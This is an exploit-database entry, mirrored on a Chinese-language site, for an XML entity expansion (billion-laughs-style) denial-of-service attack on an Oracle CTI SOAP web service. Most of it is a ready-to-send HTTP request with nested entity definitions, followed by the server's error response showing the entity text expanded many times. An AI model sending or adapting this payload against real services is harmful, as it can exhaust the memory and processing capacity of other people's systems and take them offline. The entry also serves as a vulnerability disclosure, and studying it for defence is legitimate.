Oracle CTI Web Service – ‘EBS_ASSET_HISTORY_OPERATIONS’ XML Entity Injection

  • 作者: omurugur
    日期: 2019-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46885/
  • # Exploit Title: Oracle CTI Web Service XML Entity Exp.
# Exploit Author: omurugur
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

URL : http://server/EBS_ASSET_HISTORY_OPERATIONS

 

As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.

10kb more request is returned.
Examples Request;

 

POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: text/xml;charset=UTF-8

SOAPAction: "getCampaignHistory"

Content-Length: 1696

Host: ****

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: close


<!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://server/AveaFrameWo&ha6;rk">

<soapenv:Header/>

<soapenv:Body>

 <ebs:EbsRetrieveWebChatHistoryRequest>

 <ave:RequestHeader>

 <ave:RequestId>

<ave:GUID>152069827209115206982720</ave:GUID>

 </ave:RequestId>

 <ave:CallingSystem>SIEBEL</ave:CallingSystem>

 <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>

 </ave:RequestHeader>

 <ebs:RequestBody>

 <ebs:msisdn>5051234567</ebs:msisdn>

 </ebs:RequestBody>

 </ebs:EbsRetrieveWebChatHistoryRequest>

</soapenv:Body>

</soapenv:Envelope>

 
ExampleResponse1;


HTTP/1.1 500 Internal Server Error

Date: Tue, 17 Apr 2018 06:33:07 GMT

Content-Type: text/xml; charset=utf-8

X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df

X-ORACLE-DMS-RID: 0

Connection: close

Content-Length: 328676

 

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://server/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha

! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://server/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
    Java